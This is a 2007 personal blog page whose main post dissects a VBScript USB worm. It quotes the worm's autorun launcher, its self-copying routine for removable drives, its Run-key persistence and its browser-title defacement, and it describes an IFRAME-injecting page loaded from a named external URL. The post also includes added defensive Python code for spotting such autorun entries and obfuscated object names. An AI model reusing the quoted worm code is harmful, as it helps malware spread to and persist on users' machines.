Apr 27, 2007

4D Internet Guru

Do you know what will win in today's 4D?
Don't know? No problem, just surf to a 4D internet guru...

I was surprised to hear from my friend that there are IT people who create websites offering 4D tips for sale.

Wow, what a funny idea (when I first heard about it), but it works in real society!
(no wonder 4D won't fall) =)

There are more and more special, funny, tricky ideas for web business.
Well, some of them are really just a trick! And I just learned a word from my friend's blog named E-Barrel.

Yes, this reminds me of MLM (pyramid type), where lots of people at the bottom are utilized by the fellows above them. And now it is spreading through web technology.

Just beware of it! There are many kinds of web links, IMs, emails as well as SMS spreading it.

Apr 26, 2007

Experiencing a VBScript Trojan

A few days ago I suddenly found a VBS file generated on my pen drive.
Out of curiosity, I opened it up and was shocked by it!

Set fs = createobject("Scripting.FileSystemObject")
Set WNet = WScript.CreateObject("WScript.Network")
Set mf = fs.getfile(Wscript.ScriptFullname)
oldname=CStr(fs.getfilename(Wscript.ScriptFullname))
newname = WNet.ComputerName & ".vbs"
'EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbs EHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbsEHR02.vbs
rgname = Replace(newname,".vbs","")
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe EHR02.vbs"


This line will auto-populate and execute the VBScript,
and these lines populate the VBScript to my pen drive!
Besides, this file is populated to other system paths such as windows, windows\system, windows\system32 and so on.

For each flashdrive in fs.drives
If (flashdrive.drivetype = 1) and flashdrive.path <> "A:" Then
Set tf=fs.getfile(flashdrive.path &"\EHR02.vbs")
tf.attributes =32
Set tf=fs.createtextfile(flashdrive.path &"\EHR02.vbs",2,true)
tf.write mysource
tf.close


And finally, these lines register the code in the Windows startup registry and pop up the message "Mutation of Trojan virus!" when the date is the 9th!!

Set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\" & rgname & "",winpath&"\SYSTEM32\" & newname
if check <> 1 then
If Int((100-1+1)* Rnd+1)=9 And Int(Day(date))=9 Then
MsgBox "Mutation of Trojan virus!"
End if
Wscript.sleep 60000
Else

And there is yet another response if the day is not the 9th: your IE browser title will be changed to
"Hacked by xxxxx"

rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by " & Replace(oldname,".vbs","")
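
The autorun entry and the copy to the drive root described above can be checked for on a pen drive. This is an added example, not part of the original post or of the worm: Python that parses autorun.inf text, flags commands that start a script host or script file, and lists script files in a drive's root folder. The function names, the host and extension lists, and the sample text (modelled on the "atr" string quoted above) are assumptions made for the illustration.

```python
import re
from pathlib import Path

# Script hosts and script extensions that an autorun.inf command should not reference.
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".bat", ".cmd")
# autorun.inf keys that name a command: open, shellexecute, shell\<verb>\command
COMMAND_KEY = re.compile(r"^(open|shellexecute|shell\\[^\\=]+\\command)$", re.I)

def autorun_commands(text):
    """Return (key, command) pairs from the [autorun] section of autorun.inf text."""
    found, in_section = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            if COMMAND_KEY.match(key.strip()):
                found.append((key.strip().lower(), value.strip()))
    return found

def is_script_launch(command):
    """True if the command starts a script host or points at a script file."""
    tokens = [t.strip('"').lower() for t in command.split()]
    return any(t.endswith(SCRIPT_HOSTS) or t.endswith(SCRIPT_EXTS) for t in tokens)

def scan_drive_root(root):
    """Report suspicious autorun entries and script files in a drive's root folder."""
    findings = []
    for entry in sorted(Path(root).iterdir()):
        name = entry.name.lower()
        if name == "autorun.inf" and entry.is_file():
            text = entry.read_text(errors="replace")
            findings += [f"autorun {k}={v}" for k, v in autorun_commands(text)
                         if is_script_launch(v)]
        elif entry.is_file() and name.endswith(SCRIPT_EXTS):
            findings.append(f"script in root: {entry.name}")
    return findings

# Constructed sample: the autorun text the quoted script builds in its atr variable.
SAMPLE = "[autorun]\r\nshellexecute=wscript.exe EHR02.vbs\r\n"

if __name__ == "__main__":
    print(autorun_commands(SAMPLE))
```

On a machine where the script has already run, the two registry values written by the quoted regwrite calls (the Run entry and the Internet Explorer "Window Title" value) are the other places to look.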

Well, I am shocked, but excited about it!
And I looked into VBScript on my machine and found that VBScript is actually used in a lot of fields, including IIS setup, project deployment, Photoshop batch actions and so on.

It seems nice to 'play' with since I am a VB programmer =)

And a few days later, I saw a website that had been hacked by this method again;
that website had changed into IFRAME lines across the screen.

Tracing further into it, it is from "http://www.goldunix.com/test.htm"
This Trojan builds the names of Windows objects by appending pieces held in variables, and creates the objects via the CreateObject() function

b9="M"
b10="L"
b11="H"
b12="T"
b13="T"
b14="P"
strb=b4&b5&b6&b7&b8&b9&b10&b11&b12&b13&b14
Set x = df.CreateObject(strb,"")


It uses the "Microsoft.Adodb.Stream" Get method to load the IFRAME from the hacker's site.
Then this Trojan uses createobject("Scripting.FileSystemObject",""), executes svchost.exe, and receives data from the net via this svchost.

Then it uses Createobject("Shell.Application","") and executes the ShellExecute function to create more svchost instances that retrieve and insert rubbish IFRAME code that blocks the original website.

This whole process comes from an HTML file that has VBScript inside, and unlucky users who allow ActiveX controls in their IE let the Trojan activate.
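
When reviewing a page like this, the split-up object names can be put back together without running anything. This is an added example, not code from the original post or from the page it analyses: Python that reads the script as text, resolves variables built by "&" concatenation, and reports what each CreateObject call is given. The function names, the watchlist and the second sample are assumptions; pieces whose assignment is not in the text are shown as "?" rather than guessed.

```python
import re

ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*"([^"]*)"\s*$')            # name = "literal"
CONCAT = re.compile(r'^\s*(\w+)\s*=\s*(\w+(?:\s*&\s*\w+)+)\s*$')  # name = a & b & c
CREATE = re.compile(r'CreateObject\s*\(\s*("?)([\w.]+)', re.I)
# ProgIDs that give a script file, shell or network access (assumed watchlist).
WATCHLIST = {"scripting.filesystemobject", "shell.application", "wscript.shell",
             "adodb.stream", "microsoft.xmlhttp"}

def resolve_progids(script):
    """Return every CreateObject argument with concatenated variables resolved.
    Pieces whose assignment is missing from the text become '?'."""
    values, progids = {}, []
    # Copied page source often carries '&' as the HTML entity '&amp;'.
    for line in script.replace("&amp;", "&").splitlines():
        m = ASSIGN.match(line)
        if m:
            values[m.group(1).lower()] = m.group(2)   # VBScript names ignore case
            continue
        m = CONCAT.match(line)
        if m:
            parts = [p.strip().lower() for p in m.group(2).split("&")]
            values[m.group(1).lower()] = "".join(values.get(p, "?") for p in parts)
            continue
        m = CREATE.search(line)
        if m:
            quoted, arg = m.groups()
            progids.append(arg if quoted else values.get(arg.lower(), "?"))
    return progids

def triage(script):
    """Split resolved ProgIDs into watchlisted ones and partly unresolved ones."""
    ids = resolve_progids(script)
    return ([p for p in ids if p.lower() in WATCHLIST], [p for p in ids if "?" in p])

# The fragment quoted in this post; b4..b8 are not shown there, so they stay unknown.
PAGE_FRAGMENT = "\n".join([
    'b9="M"', 'b10="L"', 'b11="H"', 'b12="T"', 'b13="T"', 'b14="P"',
    'strb=b4&b5&amp;b6&b7&b8&b9&b10&b11&b12&b13&b14',
    'Set x = df.CreateObject(strb,"")'])
# Constructed sample: the same trick with every piece present.
CONSTRUCTED = "\n".join([
    'a1="Shell"', 'a2=".Appl"', 'a3="ication"', 's=a1&a2&a3',
    'Set sh = df.CreateObject(s,"")'])

if __name__ == "__main__":
    print(triage(PAGE_FRAGMENT), triage(CONSTRUCTED))
```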

I tested that HTML file and there was no issue in my Firefox =) ha ha ha...
but IE users have to be careful about allowing unknown ActiveX ya!

Trojans are dangerous, but fun for a programmer, ha ha ha...... (just kidding, to some non-IT guys)

Apr 25, 2007

Blog Via Email

Some time ago, I came across a website or concept named moBlog (mobile blogging).
This concept lets users create their blog content in real time.

Users can snap a picture with their favorite PDA/mobile phone, send it as an MMS to the blog host and publish it.

After some months (today :P), I just found out that Blogger has had this feature for a long time.
I just created some simple content on my PDA and sent it to my Blogger Mobile address (your-blogger-id.your-given-mobileblog-name@blogger.com)

The content will be stored as a draft, and I will be able to review and publish it when I get a line, or maybe just write my blog directly on my PDA.

That is a great service! Now I don't need to remember what I want to write for my blog and can do it in real time.

Try it out!

Welcome to Elinkz / Liew10 / 610 / Yee Ling's Blog

Welcome to Elinkz Blog.

Well, my name is Yee Ling, a guy, just a generic programmer hitting the keyboard all day, with my brain processing almost 18 hrs per day.

I have moved on from my previous blog and started a new one, due to the change to a new email account.

Here I wish to express some of my personal ideas and share them with all my friends as well as the interested public.

Meet again in the next post!